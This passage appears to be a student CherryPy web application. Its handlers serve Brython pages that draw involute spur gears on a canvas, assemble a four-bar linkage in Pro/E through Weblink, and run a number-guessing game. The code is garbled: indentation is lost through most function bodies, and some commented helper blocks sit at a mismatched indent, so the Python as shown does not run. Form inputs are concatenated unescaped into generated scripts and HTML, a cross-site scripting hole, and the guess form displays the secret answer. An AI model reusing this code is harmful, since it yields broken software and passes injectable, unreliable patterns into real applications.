<form method=POST action=do2Dgear>
Number of teeth: <input type=text name=N><br />
Module: <input type=text name=M><br />
Pressure angle: <input type=text name=P><br />
<input type=submit value=send>
</form>
</body>
</html>
'''
return outstring
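    # A small illustrative helper (not part of the original assignment): the
    # basic spur-gear relations behind the N/M/P parameters used above, where
    # N is the tooth count, M the module and P the pressure angle in degrees.
    def gear_geometry(self, N=20, M=5, P=15):
        import math
        pitch_diameter = M * N  # pitch circle diameter: D = M * N
        base_diameter = pitch_diameter * math.cos(math.radians(P))  # Db = D * cos(P)
        return pitch_diameter, base_diameter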
#@+node:2015.20150331094055.1733: *3* threeDgear
@cherrypy.expose
    # N is the number of teeth, M the module, P the pressure angle
def threeDgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<form method=POST action=do3Dgear>
Number of teeth: <input type=text name=N><br />
Module: <input type=text name=M><br />
Pressure angle: <input type=text name=P><br />
<input type=submit value=send>
</form>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1762: *3* do2Dgear
@cherrypy.expose
    # N is the number of teeth, M the module, P the pressure angle
def do2Dgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<!-- the canvas drawing program follows -->
<script type="text/python">
# import document from browser
from browser import document
import math
# draw on the canvas named plotarea
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
# draw a straight line in red
ctx.beginPath()
ctx.lineWidth = 3
'''
outstring += '''
ctx.moveTo('''+str(N)+","+str(M)+")"
outstring += '''
ctx.lineTo(0, 500)
ctx.strokeStyle = "red"
ctx.stroke()
# draw another straight line in blue
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 0)
ctx.strokeStyle = "blue"
ctx.stroke()
# draw another straight line in green
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 500)
ctx.strokeStyle = "green"
ctx.stroke()
# draw a circle in black
ctx.beginPath()
ctx.lineWidth = 3
ctx.strokeStyle = "black"
ctx.arc(250,250,50,0,2*math.pi)
ctx.stroke()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1735: *3* do3Dgear
@cherrypy.expose
    # N is the number of teeth, M the module, P the pressure angle
def do3Dgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script type="text/javascript" src="/static/weblink/pfcUtils.js"></script>
<script type="text/javascript" src="/static/weblink/wl_header.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document, window
# 從 javascript 導入 JSConstructor
from javascript import JSConstructor
import math
cango = JSConstructor(window.Cango2D)
if not window.pfcIsWindows():
    window.netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect")
session = window.pfcGetProESession()
# 設定 config option
session.SetConfigOption("comp_placement_assumptions","no")
# 建立擺放零件的位置矩陣
identityMatrix = window.pfcCreate("pfcMatrix3D")
for x in range(4):
    for y in range(4):
        if x == y:
            identityMatrix.Set(x, y, 1.0)
        else:
            identityMatrix.Set(x, y, 0.0)
transf = window.pfcCreate("pfcTransform3D").Create(identityMatrix)
# 取得目前的工作目錄
currentDir = session.getCurrentDirectory()
# 以目前已開檔, 作為 model
model = session.CurrentModel
# 查驗有無 model, 或 model 類別是否為組立件
if model is None or model.Type != window.pfcCreate("pfcModelType").MDL_ASSEMBLY:
    raise ValueError("Current model is not an assembly.")
assembly = model
# ----------------------------------------------- link0 -------------------------------------------------------------
# 檔案目錄,建議將圖檔放置工作目錄下較方便使用
descr = window.pfcCreate("pfcModelDescriptor").CreateFromFileName("v:/home/fourbar/link0.prt")
# 若 link0.prt 在 session 則直接取用
componentModel = session.GetModelFromDescr(descr)
# 若 link0.prt 不在 session 則從工作目錄中載入 session
componentModel = session.RetrieveModel(descr)
# 若 link0.prt 已經在 session 則放入組立檔中
if componentModel is not None:
    # 注意這個 asmcomp 即為設定約束條件的本體
    # asmcomp 為特徵物件, 直接將零件以 transf 座標轉換放入組立檔案中
    asmcomp = assembly.AssembleComponent(componentModel, transf)
# 建立約束條件變數
constrs = window.pfcCreate("pfcComponentConstraints")
# 設定組立檔中的三個定位面, 注意內定名稱與 Pro/E WF 中的 ASM_D_FRONT 不同, 而是 ASM_FRONT
asmDatums = ["ASM_FRONT", "ASM_TOP", "ASM_RIGHT"]
# 設定零件檔中的三個定位面, 名稱與 Pro/E WF 中相同
compDatums = ["FRONT", "TOP", "RIGHT"]
# 建立 ids 變數, intseq 為 sequence of integers 為資料類別, 使用者可以經由整數索引擷取此資料類別的元件, 第一個索引為 0
ids = window.pfcCreate("intseq")
# 建立路徑變數
path = window.pfcCreate("MpfcAssembly").CreateComponentPath(assembly, ids)
# 採用互動式設定相關的變數
MpfcSelect = window.pfcCreate("MpfcSelect")
# 利用迴圈分別約束組立與零件檔中的三個定位平面
for i in range(3):
    # 設定組立參考面
    asmItem = assembly.GetItemByName(window.pfcCreate("pfcModelItemType").ITEM_SURFACE, asmDatums[i])
    # 若無對應的組立參考面, 則啟用互動式平面選擇表單 flag
    if asmItem is None:
        interactFlag = True
        continue
    # 設定零件參考面
    compItem = componentModel.GetItemByName(window.pfcCreate("pfcModelItemType").ITEM_SURFACE, compDatums[i])
    # 若無對應的零件參考面, 則啟用互動式平面選擇表單 flag
    if compItem is None:
        interactFlag = True
        continue
    asmSel = MpfcSelect.CreateModelItemSelection(asmItem, path)
    compSel = MpfcSelect.CreateModelItemSelection(compItem, None)
    constr = window.pfcCreate("pfcComponentConstraint").Create(window.pfcCreate("pfcComponentConstraintType").ASM_CONSTRAINT_ALIGN)
    constr.AssemblyReference = asmSel
    constr.ComponentReference = compSel
    constr.Attributes = window.pfcCreate("pfcConstraintAttributes").Create(False, False)
    # 將互動選擇相關資料, 附加在程式約束變數之後
    constrs.Append(constr)
# 設定組立約束條件
asmcomp.SetConstraints(constrs, None)
# -------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------- link1 -------------------------------------------------------------
descr = window.pfcCreate("pfcModelDescriptor").CreateFromFileName("v:/home/fourbar/link1.prt")
componentModel = session.GetModelFromDescr(descr)
componentModel = session.RetrieveModel(descr)
if componentModel is not None:
    asmcomp = assembly.AssembleComponent(componentModel, transf)
components = assembly.ListFeaturesByType(True, window.pfcCreate("pfcFeatureType").FEATTYPE_COMPONENT)
featID = components.Item(0).Id
ids.Append(featID)
subPath = window.pfcCreate("MpfcAssembly").CreateComponentPath(assembly, ids)
subassembly = subPath.Leaf
asmDatums = ["A_1", "TOP", "ASM_TOP"]
compDatums = ["A_1", "TOP", "TOP"]
relation = (window.pfcCreate("pfcComponentConstraintType").ASM_CONSTRAINT_ALIGN,
            window.pfcCreate("pfcComponentConstraintType").ASM_CONSTRAINT_MATE)
relationItem = (window.pfcCreate("pfcModelItemType").ITEM_AXIS,
                window.pfcCreate("pfcModelItemType").ITEM_SURFACE)
constrs = window.pfcCreate("pfcComponentConstraints")
for i in range(2):
    asmItem = subassembly.GetItemByName(relationItem[i], asmDatums[i])
    if asmItem is None:
        interactFlag = True
        continue
    compItem = componentModel.GetItemByName(relationItem[i], compDatums[i])
    if compItem is None:
        interactFlag = True
        continue
    MpfcSelect = window.pfcCreate("MpfcSelect")
    asmSel = MpfcSelect.CreateModelItemSelection(asmItem, subPath)
    compSel = MpfcSelect.CreateModelItemSelection(compItem, None)
    constr = window.pfcCreate("pfcComponentConstraint").Create(relation[i])
    constr.AssemblyReference = asmSel
    constr.ComponentReference = compSel
    constr.Attributes = window.pfcCreate("pfcConstraintAttributes").Create(True, False)
    constrs.Append(constr)
asmcomp.SetConstraints(constrs, None)
# -------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------- link2 -------------------------------------------------------------
descr = window.pfcCreate("pfcModelDescriptor").CreateFromFileName("v:/home/fourbar/link2.prt")
componentModel = session.GetModelFromDescr(descr)
componentModel = session.RetrieveModel(descr)
if componentModel is not None:
    asmcomp = assembly.AssembleComponent(componentModel, transf)
ids = window.pfcCreate("intseq")
ids.Append(featID + 1)
subPath = window.pfcCreate("MpfcAssembly").CreateComponentPath(assembly, ids)
subassembly = subPath.Leaf
asmDatums = ["A_2", "TOP", "ASM_TOP"]
compDatums = ["A_1", "TOP", "TOP"]
relation = (window.pfcCreate("pfcComponentConstraintType").ASM_CONSTRAINT_ALIGN,
            window.pfcCreate("pfcComponentConstraintType").ASM_CONSTRAINT_MATE)
relationItem = (window.pfcCreate("pfcModelItemType").ITEM_AXIS,
                window.pfcCreate("pfcModelItemType").ITEM_SURFACE)
constrs = window.pfcCreate("pfcComponentConstraints")
for i in range(2):
    asmItem = subassembly.GetItemByName(relationItem[i], asmDatums[i])
    if asmItem is None:
        interactFlag = True
        continue
    compItem = componentModel.GetItemByName(relationItem[i], compDatums[i])
    if compItem is None:
        interactFlag = True
        continue
    MpfcSelect = window.pfcCreate("MpfcSelect")
    asmSel = MpfcSelect.CreateModelItemSelection(asmItem, subPath)
    compSel = MpfcSelect.CreateModelItemSelection(compItem, None)
    constr = window.pfcCreate("pfcComponentConstraint").Create(relation[i])
    constr.AssemblyReference = asmSel
    constr.ComponentReference = compSel
    constr.Attributes = window.pfcCreate("pfcConstraintAttributes").Create(True, False)
    constrs.Append(constr)
asmcomp.SetConstraints(constrs, None)
# -------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------- link3 -------------------------------------------------------------
descr = window.pfcCreate("pfcModelDescriptor").CreateFromFileName("v:/home/fourbar/link3.prt")
componentModel = session.GetModelFromDescr(descr)
componentModel = session.RetrieveModel(descr)
if componentModel is not None:
    asmcomp = assembly.AssembleComponent(componentModel, transf)
relation = (window.pfcCreate("pfcComponentConstraintType").ASM_CONSTRAINT_ALIGN,
            window.pfcCreate("pfcComponentConstraintType").ASM_CONSTRAINT_MATE)
relationItem = (window.pfcCreate("pfcModelItemType").ITEM_AXIS,
                window.pfcCreate("pfcModelItemType").ITEM_SURFACE)
constrs = window.pfcCreate("pfcComponentConstraints")
ids = window.pfcCreate("intseq")
ids.Append(featID + 2)
subPath = window.pfcCreate("MpfcAssembly").CreateComponentPath(assembly, ids)
subassembly = subPath.Leaf
asmDatums = ["A_2"]
compDatums = ["A_1"]
for i in range(1):
    asmItem = subassembly.GetItemByName(relationItem[i], asmDatums[i])
    if asmItem is None:
        interactFlag = True
        continue
    compItem = componentModel.GetItemByName(relationItem[i], compDatums[i])
    if compItem is None:
        interactFlag = True
        continue
    MpfcSelect = window.pfcCreate("MpfcSelect")
    asmSel = MpfcSelect.CreateModelItemSelection(asmItem, subPath)
    compSel = MpfcSelect.CreateModelItemSelection(compItem, None)
    constr = window.pfcCreate("pfcComponentConstraint").Create(relation[i])
    constr.AssemblyReference = asmSel
    constr.ComponentReference = compSel
    constr.Attributes = window.pfcCreate("pfcConstraintAttributes").Create(True, False)
    constrs.Append(constr)
asmcomp.SetConstraints(constrs, None)
ids = window.pfcCreate("intseq")
ids.Append(featID)
subPath = window.pfcCreate("MpfcAssembly").CreateComponentPath(assembly, ids)
subassembly = subPath.Leaf
asmDatums = ["A_2", "TOP"]
compDatums = ["A_2", "BOTTON"]
for i in range(2):
    asmItem = subassembly.GetItemByName(relationItem[i], asmDatums[i])
    if asmItem is None:
        interactFlag = True
        continue
    compItem = componentModel.GetItemByName(relationItem[i], compDatums[i])
    if compItem is None:
        interactFlag = True
        continue
    MpfcSelect = window.pfcCreate("MpfcSelect")
    asmSel = MpfcSelect.CreateModelItemSelection(asmItem, subPath)
    compSel = MpfcSelect.CreateModelItemSelection(compItem, None)
    constr = window.pfcCreate("pfcComponentConstraint").Create(relation[i])
    constr.AssemblyReference = asmSel
    constr.ComponentReference = compSel
    constr.Attributes = window.pfcCreate("pfcConstraintAttributes").Create(True, True)
    constrs.Append(constr)
asmcomp.SetConstraints(constrs, None)
# -------------------------------------------------------------------------------------------------------------------
session = window.pfcGetProESession()
solid = session.CurrentModel
properties = solid.GetMassProperty(None)
COG = properties.GravityCenter
document.write("MassProperty:<br />")
document.write("Mass:" + str(round(properties.Mass, 2)) + " pound<br />")
document.write("Average Density:" + str(round(properties.Density, 2)) + " pound/inch^3<br />")
document.write("Surface area:" + str(round(properties.SurfaceArea, 2)) + " inch^2<br />")
document.write("Volume:" + str(round(properties.Volume, 2)) + " inch^3<br />")
document.write("COG_X:" + str(round(COG.Item(0), 2)) + "<br />")
document.write("COG_Y:" + str(round(COG.Item(1), 2)) + "<br />")
document.write("COG_Z:" + str(round(COG.Item(2), 2)) + "<br />")
try:
    document.write("Current Directory:<br />" + currentDir)
except Exception as err:
    window.alert("Exception occurred: " + str(err))
assembly.Regenerate(None)
session.GetModelWindow(assembly).Repaint()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1765: *3* mygeartest
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def mygeartest(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
from math import *
# 準備在 id="plotarea" 的 canvas 中繪圖
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
def create_line(x1, y1, x2, y2, width=3, fill="red"):
ctx.beginPath()
ctx.lineWidth = width
ctx.moveTo(x1, y1)
ctx.lineTo(x2, y2)
ctx.strokeStyle = fill
ctx.stroke()
# 導入數學函式後, 圓周率為 pi
# deg 為角度轉為徑度的轉換因子
deg = pi/180.
#
# 以下分別為正齒輪繪圖與主 tkinter 畫布繪圖
#
# 定義一個繪正齒輪的繪圖函式
# midx 為齒輪圓心 x 座標
# midy 為齒輪圓心 y 座標
# rp 為節圓半徑, n 為齒數
def 齒輪(midx, midy, rp, n, 顏色):
# 將角度轉換因子設為全域變數
global deg
# 齒輪漸開線分成 15 線段繪製
imax = 15
# 在輸入的畫布上繪製直線, 由圓心到節圓 y 軸頂點畫一直線
create_line(midx, midy, midx, midy-rp)
# 畫出 rp 圓, 畫圓函式尚未定義
#create_oval(midx-rp, midy-rp, midx+rp, midy+rp, width=2)
# a 為模數 (代表公制中齒的大小), 模數為節圓直徑(稱為節徑)除以齒數
# 模數也就是齒冠大小
a=2*rp/n
# d 為齒根大小, 為模數的 1.157 或 1.25倍, 這裡採 1.25 倍
d=2.5*rp/n
# ra 為齒輪的外圍半徑
ra=rp+a
print("ra:", ra)
# 畫出 ra 圓, 畫圓函式尚未定義
#create_oval(midx-ra, midy-ra, midx+ra, midy+ra, width=1)
# rb 則為齒輪的基圓半徑
# 基圓為漸開線長齒之基準圓
rb=rp*cos(20*deg)
print("rp:", rp)
print("rb:", rb)
# 畫出 rb 圓 (基圓), 畫圓函式尚未定義
#create_oval(midx-rb, midy-rb, midx+rb, midy+rb, width=1)
# rd 為齒根圓半徑
rd=rp-d
# 當 rd 大於 rb 時
print("rd:", rd)
# 畫出 rd 圓 (齒根圓), 畫圓函式尚未定義
#create_oval(midx-rd, midy-rd, midx+rd, midy+rd, width=1)
# dr 則為基圓到齒頂圓半徑分成 imax 段後的每段半徑增量大小
# 將圓弧分成 imax 段來繪製漸開線
dr=(ra-rb)/imax
# tan(20*deg)-20*deg 為漸開線函數
sigma=pi/(2*n)+tan(20*deg)-20*deg
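    # 以本頁示範呼叫 齒輪(400,400,300,41,...) 驗算上列公式 (數值僅為示意):
    #   a = 2*300/41 ≈ 14.63, rb = 300*cos(20*deg) ≈ 281.91
    #   sigma = pi/82 + tan(20*deg) - 20*deg ≈ 0.0532 (rad)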
for j in range(n):
ang=-2.*j*pi/n+sigma
ang2=2.*j*pi/n+sigma
lxd=midx+rd*sin(ang2-2.*pi/n)
lyd=midy-rd*cos(ang2-2.*pi/n)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(alpha-ang)
ypt=r*cos(alpha-ang)
xd=rd*sin(-ang)
yd=rd*cos(-ang)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由左側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
lfx=midx+xpt
lfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# the line from last end of dedendum point to the recent
# end of dedendum point
# lxd 為齒根圓上的左側 x 座標, lyd 則為 y 座標
# 下列為齒根圓上用來近似圓弧的直線
create_line((lxd),(lyd),(midx+xd),(midy-yd),fill=顏色)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(ang2-alpha)
ypt=r*cos(ang2-alpha)
xd=rd*sin(ang2)
yd=rd*cos(ang2)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由右側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
rfx=midx+xpt
rfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# lfx 為齒頂圓上的左側 x 座標, lfy 則為 y 座標
# 下列為齒頂圓上用來近似圓弧的直線
create_line(lfx,lfy,rfx,rfy,fill=顏色)
齒輪(400,400,300,41,"blue")
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150621222226.1: *3* drawspur
@cherrypy.expose
    # N1 為上齒數, N2 為下齒數, M 為模數, P 為壓力角
    def drawspur(self, N1=15, N2=24, M=4, P=20, midx=400):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body>
<form method=POST action=mygeartest2>
上齒數:<input type=text name=N1 value='''+str(N1)+'''><br />
下齒數:<input type=text name=N2 value='''+str(N2)+'''><br />
<input type=submit value=畫出正齒輪輪廓>
</form>
<h3>齒輪數為介於 15-80 的整數</h3>
<br /><a href="index">返回</a><br />
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script>
window.onload=function(){
brython();
}
</script>
</body>
</html>
'''
return outstring
#@+node:amd.20150415215023.1: *3* mygeartest2
@cherrypy.expose
    # N1, N2 為齒數, M 為模數, P 為壓力角
def mygeartest2(self, N1=15, N2=24, M=4, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<br /><a href="drawspur">返回</a><br />
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
from math import *
# 請注意, 這裡導入位於 Lib/site-packages 目錄下的 spur.py 檔案
import spur
# 準備在 id="plotarea" 的 canvas 中繪圖
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
# 以下利用 spur.py 程式進行繪圖, 接下來的協同設計運算必須要配合使用者的需求進行設計運算與繪圖
# 其中並將工作分配給其他組員建立類似 spur.py 的相關零件繪圖模組
# midx, midy 為齒輪圓心座標, rp 為節圓半徑, n 為齒數, pa 為壓力角, color 為線的顏色
# Gear(midx, midy, rp, n=20, pa=20, color="black"):
# 模數決定齒的尺寸大小, 囓合齒輪組必須有相同的模數與壓力角
# 壓力角 pa 單位為角度
pa = 10
# m 為模數
m = 10
# 第1齒輪齒數
n_g1 = '''+str(N1)+'''
# 第2齒輪齒數
n_g2 = '''+str(N2)+'''
# 計算兩齒輪的節圓半徑
rp_g1 = m*n_g1/2
rp_g2 = m*n_g2/2
# 將第1齒輪順時鐘轉 90 度
# 使用 ctx.save() 與 ctx.restore() 以確保各齒輪以相對座標進行旋轉繪圖
ctx.save()
# translate to the origin of second gear
ctx.translate(400,400)
# rotate to engage
ctx.rotate(pi)
# put it back
ctx.translate(-400,-400)
spur.Spur(ctx).Gear(400,400,rp_g1,n_g1, pa, "blue")
ctx.restore()
# 將第2齒輪逆時鐘轉 90 度之後, 再多轉一齒, 以便與第1齒輪進行囓合
ctx.save()
# translate to the origin of second gear
ctx.translate(400,400+rp_g1+rp_g2)
# rotate to engage
ctx.rotate(-pi/n_g2)
# put it back
ctx.translate(-400,-(400+rp_g1+rp_g2))
spur.Spur(ctx).Gear(400,400+rp_g1+rp_g2,rp_g2,n_g2, pa, "black")
ctx.restore()
# 按照上面兩個正齒輪的囓合轉角運算, 隨後的傳動齒輪轉角便可依此類推, 完成6個齒輪的囓合繪圖
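# 延伸到第三個齒輪的示意草稿 (n_g3, rp_g3 為假設變數, 實際囓合轉角仍需依 g2 的轉角驗證):
#   rp_g3 = m*n_g3/2
#   ctx.save()
#   ctx.translate(400, 400+rp_g1+2*rp_g2+rp_g3)
#   ctx.rotate(pi/n_g3)
#   ctx.translate(-400, -(400+rp_g1+2*rp_g2+rp_g3))
#   spur.Spur(ctx).Gear(400, 400+rp_g1+2*rp_g2+rp_g3, rp_g3, n_g3, pa, "red")
#   ctx.restore()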
</script>
<canvas id="plotarea" width="1500" height="1500"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1737: *3* my3Dgeartest
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def my3Dgeartest(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
from math import *
# 準備在 id="plotarea" 的 canvas 中繪圖
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
def create_line(x1, y1, x2, y2, width=3, fill="red"):
ctx.beginPath()
ctx.lineWidth = width
ctx.moveTo(x1, y1)
ctx.lineTo(x2, y2)
ctx.strokeStyle = fill
ctx.stroke()
# 導入數學函式後, 圓周率為 pi
# deg 為角度轉為徑度的轉換因子
deg = pi/180.
#
# 以下分別為正齒輪繪圖與主 tkinter 畫布繪圖
#
# 定義一個繪正齒輪的繪圖函式
# midx 為齒輪圓心 x 座標
# midy 為齒輪圓心 y 座標
# rp 為節圓半徑, n 為齒數
def gear(midx, midy, rp, n, 顏色):
# 將角度轉換因子設為全域變數
global deg
# 齒輪漸開線分成 15 線段繪製
imax = 15
# 在輸入的畫布上繪製直線, 由圓心到節圓 y 軸頂點畫一直線
create_line(midx, midy, midx, midy-rp)
# 畫出 rp 圓, 畫圓函式尚未定義
#create_oval(midx-rp, midy-rp, midx+rp, midy+rp, width=2)
# a 為模數 (代表公制中齒的大小), 模數為節圓直徑(稱為節徑)除以齒數
# 模數也就是齒冠大小
a=2*rp/n
# d 為齒根大小, 為模數的 1.157 或 1.25倍, 這裡採 1.25 倍
d=2.5*rp/n
# ra 為齒輪的外圍半徑
ra=rp+a
print("ra:", ra)
# 畫出 ra 圓, 畫圓函式尚未定義
#create_oval(midx-ra, midy-ra, midx+ra, midy+ra, width=1)
# rb 則為齒輪的基圓半徑
# 基圓為漸開線長齒之基準圓
rb=rp*cos(20*deg)
print("rp:", rp)
print("rb:", rb)
# 畫出 rb 圓 (基圓), 畫圓函式尚未定義
#create_oval(midx-rb, midy-rb, midx+rb, midy+rb, width=1)
# rd 為齒根圓半徑
rd=rp-d
# 當 rd 大於 rb 時
print("rd:", rd)
# 畫出 rd 圓 (齒根圓), 畫圓函式尚未定義
#create_oval(midx-rd, midy-rd, midx+rd, midy+rd, width=1)
# dr 則為基圓到齒頂圓半徑分成 imax 段後的每段半徑增量大小
# 將圓弧分成 imax 段來繪製漸開線
dr=(ra-rb)/imax
# tan(20*deg)-20*deg 為漸開線函數
sigma=pi/(2*n)+tan(20*deg)-20*deg
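    # 以本頁示範呼叫 gear(400,400,300,41,...) 驗算上列公式 (數值僅為示意):
    #   a = 2*300/41 ≈ 14.63, rb = 300*cos(20*deg) ≈ 281.91
    #   sigma = pi/82 + tan(20*deg) - 20*deg ≈ 0.0532 (rad)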
for j in range(n):
ang=-2.*j*pi/n+sigma
ang2=2.*j*pi/n+sigma
lxd=midx+rd*sin(ang2-2.*pi/n)
lyd=midy-rd*cos(ang2-2.*pi/n)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(alpha-ang)
ypt=r*cos(alpha-ang)
xd=rd*sin(-ang)
yd=rd*cos(-ang)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由左側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
lfx=midx+xpt
lfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# the line from last end of dedendum point to the recent
# end of dedendum point
# lxd 為齒根圓上的左側 x 座標, lyd 則為 y 座標
# 下列為齒根圓上用來近似圓弧的直線
create_line((lxd),(lyd),(midx+xd),(midy-yd),fill=顏色)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(ang2-alpha)
ypt=r*cos(ang2-alpha)
xd=rd*sin(ang2)
yd=rd*cos(ang2)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由右側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
rfx=midx+xpt
rfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# lfx 為齒頂圓上的左側 x 座標, lfy 則為 y 座標
# 下列為齒頂圓上用來近似圓弧的直線
create_line(lfx,lfy,rfx,rfy,fill=顏色)
gear(400,400,300,41,"blue")
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
</body>
</html>
'''
return outstring
#@+node:2014fall.20141215194146.1793: *3* doCheck
@cherrypy.expose
def doCheck(self, guess=None):
# 假如使用者直接執行 doCheck, 則設法轉回根方法
if guess is None:
raise cherrypy.HTTPRedirect("/")
# 從 session 取出 answer 對應資料, 且處理直接執行 doCheck 時無法取 session 值情況
try:
theanswer = int(cherrypy.session.get('answer'))
except:
raise cherrypy.HTTPRedirect("/")
# 經由表單所取得的 guess 資料型別為 string
try:
theguess = int(guess)
except:
return "error " + self.guessform()
# 每執行 doCheck 一次,次數增量一次
cherrypy.session['count'] += 1
# 答案與所猜數字進行比對
if theanswer < theguess:
return "big " + self.guessform()
elif theanswer > theguess:
return "small " + self.guessform()
else:
# 已經猜對, 從 session 取出累計猜測次數
thecount = cherrypy.session.get('count')
return "exact: <a href=''>再猜</a>"
#@+node:2014fall.20141215194146.1789: *3* guessform
def guessform(self):
# 印出讓使用者輸入的超文件表單
outstring = str(cherrypy.session.get('answer')) + "/" + str(cherrypy.session.get('count')) + '''<form method=POST action=doCheck>
請輸入您所猜的整數:<input type=text name=guess><br />
<input type=submit value=send>
</form>'''
return outstring
#@-others
#@-others
################# (4) 程式啟動區
# 配合程式檔案所在目錄設定靜態目錄或靜態檔案
application_conf = {'/static':{
'tools.staticdir.on': True,
# 程式執行目錄下, 必須自行建立 static 目錄
'tools.staticdir.dir': _curdir+"/static"},
'/downloads':{
'tools.staticdir.on': True,
